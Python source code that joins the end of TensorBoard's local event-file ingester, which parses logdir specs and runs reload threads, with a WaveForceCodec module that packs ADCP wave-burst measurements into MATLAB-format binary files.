flags: An argparse.Namespace containing TensorBoard CLI flags.
Returns:
The new `LocalDataIngester`.
"""
tensor_size_guidance = dict(DEFAULT_TENSOR_SIZE_GUIDANCE)
tensor_size_guidance.update(flags.samples_per_plugin)
self._multiplexer = plugin_event_multiplexer.EventMultiplexer(
size_guidance=DEFAULT_SIZE_GUIDANCE,
tensor_size_guidance=tensor_size_guidance,
purge_orphaned_data=flags.purge_orphaned_data,
max_reload_threads=flags.max_reload_threads,
event_file_active_filter=_get_event_file_active_filter(flags),
detect_file_replacement=flags.detect_file_replacement,
)
self._data_provider = data_provider.MultiplexerDataProvider(
self._multiplexer, flags.logdir or flags.logdir_spec
)
self._reload_interval = flags.reload_interval
self._reload_task = flags.reload_task
if flags.logdir:
self._path_to_run = {os.path.expanduser(flags.logdir): None}
else:
self._path_to_run = _parse_event_files_spec(flags.logdir_spec)
# Conditionally import tensorflow_io.
if getattr(tf, "__version__", "stub") != "stub":
_check_filesystem_support(self._path_to_run.keys())
@property
def data_provider(self):
return self._data_provider
@property
def deprecated_multiplexer(self):
return self._multiplexer
def start(self):
"""Starts ingesting data based on the ingester flag configuration."""
def _reload():
while True:
start = time.time()
logger.info("TensorBoard reload process beginning")
for path, name in self._path_to_run.items():
self._multiplexer.AddRunsFromDirectory(path, name)
logger.info(
"TensorBoard reload process: Reload the whole Multiplexer"
)
self._multiplexer.Reload()
duration = time.time() - start
logger.info(
"TensorBoard done reloading. Load took %0.3f secs", duration
)
if self._reload_interval == 0:
# Only load the multiplexer once. Do not continuously reload.
break
time.sleep(self._reload_interval)
if self._reload_task == "process":
logger.info("Launching reload in a child process")
import multiprocessing
process = multiprocessing.Process(target=_reload, name="Reloader")
# Best-effort cleanup; on exit, the main TB parent process will attempt to
# kill all its daemonic children.
process.daemon = True
process.start()
elif self._reload_task in ("thread", "auto"):
logger.info("Launching reload in a daemon thread")
thread = threading.Thread(target=_reload, name="Reloader")
# Make this a daemon thread, which won't block TB from exiting.
thread.daemon = True
thread.start()
elif self._reload_task == "blocking":
if self._reload_interval != 0:
raise ValueError(
"blocking reload only allowed with load_interval=0"
)
_reload()
else:
raise ValueError("unrecognized reload_task: %s" % self._reload_task)
def _get_event_file_active_filter(flags):
"""Returns a predicate for whether an event file load timestamp is active.
Returns:
A predicate function accepting a single UNIX timestamp float argument, or
None if multi-file loading is not enabled.
"""
if not flags.reload_multifile:
return None
inactive_secs = flags.reload_multifile_inactive_secs
if inactive_secs == 0:
return None
if inactive_secs < 0:
return lambda timestamp: True
return lambda timestamp: timestamp + inactive_secs >= time.time()
def _parse_event_files_spec(logdir_spec):
"""Parses `logdir_spec` into a map from paths to run group names.
The `--logdir_spec` flag format is a comma-separated list of path
specifications. A path spec looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a spec
with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir_spec is None:
return files
# Make sure keeping consistent with ParseURI in core/lib/io/path.cc
uri_pattern = re.compile("[a-zA-Z][0-9a-zA-Z.]*://.*")
for specification in logdir_spec.split(","):
# Check if the spec contains group. A spec start with xyz:// is regarded as
# URI path spec instead of group spec. If the spec looks like /foo:bar/baz,
# then we assume it's a path with a colon. If the spec looks like
# [a-zA-z]:\foo then we assume its a Windows path and not a single letter
# group
if (
uri_pattern.match(specification) is None
and ":" in specification
and specification[0] != "/"
and not os.path.splitdrive(specification)[0]
):
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(":")
else:
run_name = None
path = specification
if uri_pattern.match(path) is None:
path = os.path.realpath(os.path.expanduser(path))
files[path] = run_name
return files
def _get_filesystem_scheme(path):
"""Extracts filesystem scheme from a given path.
The filesystem scheme is usually separated by `://` from the local filesystem
path if given. For example, the scheme of `file://tmp/tf` is `file`.
Args:
path: A strings representing an input log directory.
Returns:
Filesystem scheme, None if the path doesn't contain one.
"""
if "://" not in path:
return None
return path.split("://")[0]
def _check_filesystem_support(paths):
"""Examines the list of filesystems user requested.
If TF I/O schemes are requested, try to import tensorflow_io module.
Args:
paths: A list of strings representing input log directories.
"""
get_registered_schemes = getattr(
tf.io.gfile, "get_registered_schemes", None
)
registered_schemes = (
None if get_registered_schemes is None else get_registered_schemes()
)
# Only need to check one path for each scheme.
scheme_to_path = {_get_filesystem_scheme(path): path for path in paths}
missing_scheme = None
for scheme, path in scheme_to_path.items():
if scheme is None:
continue
# Use `tf.io.gfile.exists.get_registered_schemes` if possible.
if registered_schemes is not None:
if scheme not in registered_schemes:
missing_scheme = scheme
break
else:
# Fall back to `tf.io.gfile.exists`.
try:
tf.io.gfile.exists(path)
except tf.errors.UnimplementedError:
missing_scheme = scheme
break
except tf.errors.OpError:
# Swallow other errors; we aren't concerned about them at this point.
pass
if missing_scheme:
try:
import tensorflow_io # noqa: F401
except ImportError as e:
supported_schemes_msg = (
" (supported schemes: {})".format(registered_schemes)
if registered_schemes
else ""
)
raise tf.errors.UnimplementedError(
None,
None,
(
"Error: Unsupported filename scheme '{}'{}. For additional"
+ " filesystem support, consider installing TensorFlow I/O"
+ " (https://www.tensorflow.org/io) via `pip install tensorflow-io`."
).format(missing_scheme, supported_schemes_msg),
) from e
|
WaveForceCodec.py
|
import logging
import os
import struct
import threading
from Waves.WaveEnsemble import WaveEnsemble
logger = logging.getLogger("WaveForce Codec")
logger.setLevel(logging.ERROR)
FORMAT = '[%(asctime)-15s][%(levelname)s][%(name)s:%(funcName)s] %(message)s'
logging.basicConfig(format=FORMAT)
class WaveForceCodec:
"""
Decode the ensemble data into a WaveForce Matlab file format.
"""
def __init__(self):
self.Lat = 0.0
self.Lon = 0.0
self.EnsInBurst = 0
self.FilePath = ""
self.EnsInBurst = 0
self.Buffer = []
self.BufferCount = 0
self.RecordCount = 0
self.Bin1 = 0
self.Bin2 = 0
self.Bin3 = 0
self.PressureSensorDepth = 0
self.firstTime = 0
self.secondTime = 0 # Used to calculate the sample timing
self.selected_bin = []
def init(self, ens_in_burst, path, lat, lon, bin1, bin2, bin3, ps_depth):
"""
Initialize the wave recorder
:param ens_in_burst: Number of ensembles in a burst.
:param path: File path to store the file.
:param lat: Latitude data.
:param lon: Longitude data.
:param bin1: First selected bin.
:param bin2: Second selected bin.
:param bin3: Third selected bin.
:param ps_depth Pressure Sensor depth. Depth of the ADCP.
"""
self.EnsInBurst = ens_in_burst
self.FilePath = path
self.Lat = lat
self.Lon = lon
self.Buffer = []
self.BufferCount = 0
self.Bin1 = bin1
self.Bin2 = bin2
self.Bin3 = bin3
self.PressureSensorDepth = ps_depth
self.RecordCount = 0
self.selected_bin.append(bin1)
self.selected_bin.append(bin2)
self.selected_bin.append(bin3)
self.firstTime = 0
self.secondTime = 0 # Used to calculate the sample timing
def add(self, ens):
"""
Add the ensemble to the buffer. When the buffer number has been met,
process the buffer and output the data to a matlab file.
:param ens: Ensemble to buffer.
"""
if self.EnsInBurst > 0:
logger.debug("Added Ensemble to burst")
# Add to the buffer
self.Buffer.append(ens)
self.BufferCount += 1
# Process the buffer when a burst is complete
if self.BufferCount == self.EnsInBurst:
# Get the ensembles from the buffer
ens_buff = self.Buffer[0:self.EnsInBurst]
# Remove the ensembles from the buffer
del self.Buffer[0:self.EnsInBurst]
self.BufferCount = 0
# Process the buffer
th = threading.Thread(target=self.process, args=[ens_buff])
th.start()
def process(self, ens_buff):
"""
Process all the data in the ensemble buffer.
:param ens_buff: Ensemble data buffer.
"""
logger.debug("Process Waves Burst")
# Local variables
num_bins = len(self.selected_bin)
num_4beam_ens = 0
num_vert_ens = 0
wus_buff = bytearray()
wvs_buff = bytearray()
wzs_buff = bytearray()
beam_0_vel = bytearray()
beam_1_vel = bytearray()
beam_2_vel = bytearray()
beam_3_vel = bytearray()
beam_vert_vel = bytearray()
rt_0 = bytearray()
rt_1 = bytearray()
rt_2 = bytearray()
rt_3 = bytearray()
rt_vert = bytearray()
pressure = bytearray()
vert_pressure = bytearray()
heading = bytearray()
pitch = bytearray()
roll = bytearray()
water_temp = bytearray()
height = bytearray()
avg_range_track = bytearray()
sel_bins_buff = bytearray()
ps_depth_buff = bytearray()
ens_waves_buff = []
# Convert the buffer to wave ensembles
# Process the data for each waves ensemble
for ens in ens_buff:
# Create a waves ensemble
ens_wave = WaveEnsemble()
ens_wave.add(ens, self.selected_bin)
# Add the waves ensemble to the list
ens_waves_buff.append(ens_wave)
if ens_wave.is_vertical_ens:
# Vertical Beam data
num_vert_ens += 1
# Pressure (WZP)
vert_pressure.extend(struct.pack('f', ens_wave.pressure))
for sel_bin in range(num_bins):
# Beam Velocity (WZ0)
beam_vert_vel.extend(struct.pack('f', ens_wave.vert_beam_vel[sel_bin]))
# Range Tracking (WZR)
rt_vert.extend(struct.pack('f', ens_wave.range_tracking[0]))
else:
# 4 Beam Data
num_4beam_ens += 1
pressure.extend(struct.pack('f', ens_wave.pressure)) # Pressure (WPS)
heading.extend(struct.pack('f', ens_wave.heading)) # Heading (WHG)
pitch.extend(struct.pack('f', ens_wave.pitch)) # Pitch (WPH)
roll.extend(struct.pack('f', ens_wave.roll)) # Roll (WRL)
water_temp.extend(struct.pack('f', ens_wave.water_temp)) # Water Temp (WTS)
height.extend(struct.pack('f', ens_wave.height)) # Height (WHS)
avg_range_track.extend(struct.pack('f', ens_wave.avg_range_tracking)) # Avg Range Tracking (WAH)
# Range Tracking (WR0, WR1, WR2, WR3)
rt_0.extend(struct.pack('f', ens_wave.range_tracking[0])) # Beam 0 RT
if ens_wave.num_beams > 1:
rt_1.extend(struct.pack('f', ens_wave.range_tracking[1])) # Beam 1 RT
if ens_wave.num_beams > 2:
rt_2.extend(struct.pack('f', ens_wave.range_tracking[2])) # Beam 2 RT
if ens_wave.num_beams > 3:
rt_3.extend(struct.pack('f', ens_wave.range_tracking[3])) # Beam 3 RT
for sel_bin in range(num_bins):
# Earth Velocity (WUS, WVS, WZS)
wus_buff.extend(struct.pack('f', ens_wave.east_vel[sel_bin]))
wvs_buff.extend(struct.pack('f', ens_wave.north_vel[sel_bin]))
wzs_buff.extend(struct.pack('f', ens_wave.vertical_vel[sel_bin]))
# Beam Velocity (WB0, WB1, WB2, WB3)
beam_0_vel.extend(struct.pack('f', ens_wave.beam_vel[sel_bin][0])) # Beam 0 Beam Velocity
if ens_wave.num_beams > 1:
beam_1_vel.extend(struct.pack('f', ens_wave.beam_vel[sel_bin][1])) # Beam 1 Beam Velocity
if ens_wave.num_beams > 2:
beam_2_vel.extend(struct.pack('f', ens_wave.beam_vel[sel_bin][2])) # Beam 2 Beam Velocity
if ens_wave.num_beams > 3:
beam_3_vel.extend(struct.pack('f', ens_wave.beam_vel[sel_bin][3])) # Beam 3 Beam Velocity
# Selected Bins
if ens_buff[0].IsEnsembleData:
for sel_bin in range(num_bins):
bin_ht = ens_buff[0].AncillaryData.FirstBinRange + (self.selected_bin[sel_bin] * ens_buff[0].AncillaryData.BinSize)
sel_bins_buff.extend(struct.pack('f', bin_ht))
# Pressure Sensor Depth
ps_depth_buff.extend(struct.pack('f', self.PressureSensorDepth))
ba = bytearray()
ba.extend(self.process_txt(ens_buff[0])) # [TXT] Txt to describe burst
ba.extend(self.process_lat(ens_buff[0])) # [LAT] Latitude
ba.extend(self.process_lon(ens_buff[0])) # [LON] Longitude
ba.extend(self.process_wft(ens_buff[0])) # [WFT] Time from the first ensemble
ba.extend(self.process_wdt(ens_buff)) # [WDT] Time between ensembles
ba.extend(self.process_whv(sel_bins_buff, num_bins)) # [WHV] Wave Cell Depths
ba.extend(self.process_whp(ps_depth_buff)) # [WHP] Pressure Sensor Height
ba.extend(self.process_wus(wus_buff, num_4beam_ens, num_bins)) # [WUS] East Velocity
ba.extend(self.process_wvs(wvs_buff, num_4beam_ens, num_bins)) # [WVS] North Velocity
ba.extend(self.process_wzs(wzs_buff, num_4beam_ens, num_bins)) # [WZS] Vertical Velocity
ba.extend(self.process_wb0(beam_0_vel, num_4beam_ens, num_bins)) # [WB0] Beam 0 Beam Velocity
ba.extend(self.process_wb1(beam_1_vel, num_4beam_ens, num_bins)) # [WB1] Beam 1 Beam Velocity
ba.extend(self.process_wb2(beam_2_vel, num_4beam_ens, num_bins)) # [WB2] Beam 2 Beam Velocity
ba.extend(self.process_wb3(beam_3_vel, num_4beam_ens, num_bins)) # [WB3] Beam 3 Beam Velocity
ba.extend(self.process_wr0(rt_0, num_4beam_ens)) # [WR0] Beam 0 Range Tracking
ba.extend(self.process_wr1(rt_1, num_4beam_ens)) # [WR1] Beam 1 Range Tracking
ba.extend(self.process_wr2(rt_2, num_4beam_ens)) # [WR2] Beam 2 Range Tracking
ba.extend(self.process_wr3(rt_3, num_4beam_ens)) # [WR3] Beam 3 Range Tracking
ba.extend(self.process_wps(pressure, num_4beam_ens)) # [WPS] Pressure
ba.extend(self.process_whg(heading, num_4beam_ens)) # [WHG] Heading
ba.extend(self.process_wph(pitch, num_4beam_ens)) # [WPH] Pitch
ba.extend(self.process_wrl(roll, num_4beam_ens)) # [WRL] Roll
ba.extend(self.process_wts(water_temp, num_4beam_ens)) # [WTS] Water Temp
ba.extend(self.process_whs(height, num_4beam_ens)) # [WHS] Wave Height Source. (User Select. Range Tracking Beam or Vertical Beam or Pressure)
ba.extend(self.process_wah(avg_range_track, num_4beam_ens)) # [WAH] Average Range Tracking
ba.extend(self.process_wz0(beam_3_vel, num_vert_ens, num_bins)) # [WZ0] Vertical Beam Beam Velocity
ba.extend(self.process_wzp(vert_pressure, num_vert_ens)) # [WZP] Vertical Beam Pressure
ba.extend(self.process_wzr(rt_vert, num_vert_ens)) # [WZR] Vertical Beam Range Tracking
# Write the file
self.write_file(ba)
# Increment the record count
self.RecordCount += 1
def write_file(self, ba):
"""
Write the Bytearray to a file. Save it with the record number
:param ba: Byte Array with record data.
:return:
"""
# Check if the file path exist, if not, then create the file path
if not os.path.isdir(self.FilePath):
os.mkdir(self.FilePath)
filename = self.FilePath + "D0000" + str(self.RecordCount) + ".mat"
with open(filename, 'wb') as f:
f.write(ba)
def process_txt(self, ens):
"""
This will give a text description of the burst. This will include the record number,
the serial number and the date and time of the burst started.
Data Type: Text
Rows: 1
Columns: Text Length
txt = 2013/07/30 21:00:00.00, Record No. 7, SN013B0000000000000000000000000000
:param ens: Ensemble data.
:return: Byte array of the data in MATLAB format.
"""
txt = ens.EnsembleData.datetime_str() + ", "
txt += "Record No. " + str(self.RecordCount) + ", "
txt += "SN" + ens.EnsembleData.SerialNumber
ba = bytearray()
ba.extend(struct.pack('i', 11)) # Indicate float string
ba.extend(struct.pack('i', 1)) # Rows - 1 per record
ba.extend(struct.pack("i", len(txt))) # Columns - Length of the txt
ba.extend(struct.pack("i", 0)) # Imaginary, if 1, then the matrix has an imaginary part
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'txt'): # Name
ba.extend([code])
ba.extend(bytearray(1))
for code in map(ord, txt): # Txt Value
ba.extend(struct.pack('f', float(code)))
return ba
def process_lat(self, ens):
"""
The latitude location where the burst was collected.
Data Type: Double
Rows: 1
Columns: 1
lat = 32.865
:param ens: Ensemble data.
"""
lat = 0.0
if ens.IsWavesInfo:
lat = ens.WavesInfo.Lat
else:
lat = self.Lat
ba = bytearray()
ba.extend(struct.pack('i', 0)) # Indicate double
ba.extend(struct.pack('i', 1)) # Rows - 1 per record
ba.extend(struct.pack("i", 1)) # Columns - 1 per record
ba.extend(struct.pack("i", 0)) # Imaginary, if 1, then the matrix has an imaginary part
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'lat'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(struct.pack("d", lat)) # Lat Value
return ba
def process_lon(self, ens):
"""
The longitude location where the burst was collected.
Data Type: Double
Rows: 1
Columns: 1
lon = -117.26
:param ens: Ensemble data.
"""
lon = 0.0
if ens.IsWavesInfo:
lon = ens.WavesInfo.Lat
else:
lon = self.Lon
ba = bytearray()
ba.extend(struct.pack('I', 0)) # Indicate double
ba.extend(struct.pack('I', 1)) # Rows - 1 per record
ba.extend(struct.pack("I", 1)) # Columns - 1 per record
ba.extend(struct.pack("I", 0)) # Imaginary
ba.extend(struct.pack("I", 4)) # Name Length
for code in map(ord, 'lon'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(struct.pack("d", lon)) # Lon Value
return ba
def process_wft(self, ens):
"""
First sample time of the burst in seconds. The value is in hours of a day. WFT * 24 =
Data Type: Double
Rows: 1
Columns: 1
wft = 7.3545e+05
:param ens: Ensemble data.
"""
self.firstTime = self.time_stamp_seconds(ens)
ba = bytearray()
ba.extend(struct.pack('i', 0)) # Indicate double
ba.extend(struct.pack('i', 1)) # Rows - 1 per record
ba.extend(struct.pack("i", 1)) # Columns - 1 per record
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wft'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(struct.pack("d", self.firstTime)) # WFT Value
return ba
def process_wdt(self, ens_buff):
"""
Time between each sample. The time is in seconds.
Data Type: Double
Rows: 1
Columns: 1
wft = 0.5000
:param ens: Ensemble data.
"""
# Find the first and second time
# Make sure that if we are interleaved,
# that we take the next sample that is like the original subsystem config
ba = bytearray()
if len(ens_buff) >= 4:
# Get the first 4 Beam sample
if ens_buff[0].IsEnsembleData:
subcfg = ens_buff[0].EnsembleData.SubsystemConfig
subcode =ens_buff[0].EnsembleData.SysFirmwareSubsystemCode
self.firstTime = self.time_stamp_seconds(ens_buff[0])
# Check if both subsystems match
# If they do match, then there is no interleaving and we can take the next sample
# If there is interleaving, then we have to wait for the next sample, because the first 2 go together
if ens_buff[1].EnsembleData.SubsystemConfig == subcfg and ens_buff[1].EnsembleData.SysFirmwareSubsystemCode == subcode:
self.secondTime = WaveForceCodec.time_stamp_seconds(ens_buff[1])
else:
self.secondTime = WaveForceCodec.time_stamp_seconds(ens_buff[2])
wdt = self.secondTime - self.firstTime
ba.extend(struct.pack('i', 0)) # Indicate double
ba.extend(struct.pack('i', 1)) # Rows - 1 per record
ba.extend(struct.pack("i", 1)) # Columns - 1 per record
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wdt'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(struct.pack("d", wdt)) # WDT Value
return ba
def process_whv(self, whv, num_selected_bins):
"""
Wave Cell Height for each selected bin.
Data Type: Float
Rows: Number of Selected Bin values
Columns: 1
whv = 7.3, 7.2, 7.5
:param whv: Wave Cell Height data in byte array for each selected bin.
:param num_selected_bins: Number of selected bins.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', 1)) # Rows - 1 per burst
ba.extend(struct.pack("i", num_selected_bins)) # Columns - 1 each selected bin
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'whv'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(whv) # WHV Values
return ba
def process_whp(self, whp):
"""
Wave Pressure Sensor Height for each burst.
Data Type: Float
Rows: Number of Selected Bin values
Columns: 1
whp = 7.3
:param whp: Wave Pressure Sensor Height data in byte array for each selected bin.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', 1)) # Rows - 1 per burst
ba.extend(struct.pack("i", 1)) # Columns - 1 per burst
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'whp'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(whp) # WHP Values
return ba
def process_wus(self, wus, num_4beam_ens, num_selected_bins):
"""
East velocity data for each selected bin.
Data Type: Float
Rows: Number of 4 Beam values
Columns: Number of selected bins
wus = 7.3, 7.2, 7.5
7.2, 4.1, 6.7
:param wus: East velocity data in byte array for each selected bin.
:param num_4beam_ens: Number of 4 Beam ensembles.
:param num_selected_bins: Number of selected bins.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", num_selected_bins)) # Columns - Number of selected bins
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wus'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wus) # WUS Values
return ba
def process_wvs(self, wvs, num_4beam_ens, num_selected_bins):
"""
North velocity data for each selected bin.
Data Type: Float
Rows: Number of 4 Beam values
Columns: Number of selected bins
wvs = 7.3, 7.2, 7.5
7.2, 4.1, 6.7
:param wvs: North velocity data in byte array for each selected bin.
:param num_4beam_ens: Number of 4 Beam ensembles.
:param num_selected_bins: Number of selected bins.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", num_selected_bins)) # Columns - Number of selected bins
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wvs'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wvs) # WVS Values
return ba
def process_wzs(self, wzs, num_4beam_ens, num_selected_bins):
"""
Vertical velocity data for each selected bin.
Data Type: Float
Rows: Number of 4 Beam values
Columns: Number of selected bins
wzs = 7.3, 7.2, 7.5
7.2, 4.1, 6.7
:param wzs: North velocity data in byte array for each selected bin.
:param num_4beam_ens: Number of 4 Beam ensembles.
:param num_selected_bins: Number of selected bins.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", num_selected_bins)) # Columns - Number of selected bins
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wzs'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wzs) # WZS Values
return ba
def process_wb0(self, wb0, num_4beam_ens, num_selected_bins):
"""
Beam 0 Beam velocity data for each selected bin.
Data Type: Float
Rows: Number of 4 Beam values
Columns: Number of selected bins
wb0 = 7.3, 7.2, 7.5
7.2, 4.1, 6.7
:param wb0: Beam 0 Beam velocity data in byte array for each selected bin.
:param num_4beam_ens: Number of 4 Beam ensembles.
:param num_selected_bins: Number of selected bins.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", num_selected_bins)) # Columns - Number of selected bins
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wb0'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wb0) # WB0 Values
return ba
def process_wb1(self, wb1, num_4beam_ens, num_selected_bins):
"""
Beam 1 Beam velocity data for each selected bin.
Data Type: Float
Rows: Number of 4 Beam values
Columns: Number of selected bins
wb1 = 7.3, 7.2, 7.5
7.2, 4.1, 6.7
:param wb1: Beam 1 Beam velocity data in byte array for each selected bin.
:param num_4beam_ens: Number of 4 Beam ensembles.
:param num_selected_bins: Number of selected bins.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", num_selected_bins)) # Columns - Number of selected bins
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wb1'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wb1) # WB1 Values
return ba
def process_wb2(self, wb2, num_4beam_ens, num_selected_bins):
"""
Beam 2 Beam velocity data for each selected bin.
Data Type: Float
Rows: Number of 4 Beam values
Columns: Number of selected bins
wb2 = 7.3, 7.2, 7.5
7.2, 4.1, 6.7
:param wb2: Beam 2 Beam velocity data in byte array for each selected bin.
:param num_4beam_ens: Number of 4 Beam ensembles.
:param num_selected_bins: Number of selected bins.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", num_selected_bins)) # Columns - Number of selected bins
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wb2'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wb2) # WB2 Values
return ba
def process_wb3(self, wb3, num_4beam_ens, num_selected_bins):
"""
Beam 3 Beam velocity data for each selected bin.
Data Type: Float
Rows: Number of 4 Beam values
Columns: Number of selected bins
wb3 = 7.3, 7.2, 7.5
7.2, 4.1, 6.7
:param wb3: Beam 3 Beam velocity data in byte array for each selected bin.
:param num_4beam_ens: Number of 4 Beam ensembles.
:param num_selected_bins: Number of selected bins.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", num_selected_bins)) # Columns - Number of selected bins
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wb3'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wb3) # WB3 Values
return ba
def process_wps(self, wps, num_4beam_ens):
"""
Pressure data.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WPS = 7.3, 7.2, 7.5
:param wps: Pressure data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wps'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wps) # WPS Values
return ba
def process_whg(self, whg, num_4beam_ens):
"""
Heading data.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WHG = 7.3, 7.2, 7.5
:param whg: Heading data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'whg'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(whg) # WHG Values
return ba
def process_wph(self, wph, num_4beam_ens):
"""
Pitch data.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WPH = 7.3, 7.2, 7.5
:param wph: Heading data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wph'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wph) # WPH Values
return ba
def process_wrl(self, wrl, num_4beam_ens):
"""
Roll data.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WRL = 7.3, 7.2, 7.5
:param wrl: Roll data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wrl'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wrl) # WRL Values
return ba
def process_wts(self, wts, num_4beam_ens):
"""
Water Temp data.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WTS = 7.3, 7.2, 7.5
:param wts: Water Temp data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wts'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wts) # WTS Values
return ba
def process_whs(self, whs, num_4beam_ens):
"""
Wave height source data.
Average of RT, or a single RT value, or pressure.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WHS = 7.3, 7.2, 7.5
:param whs: Wave height source data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
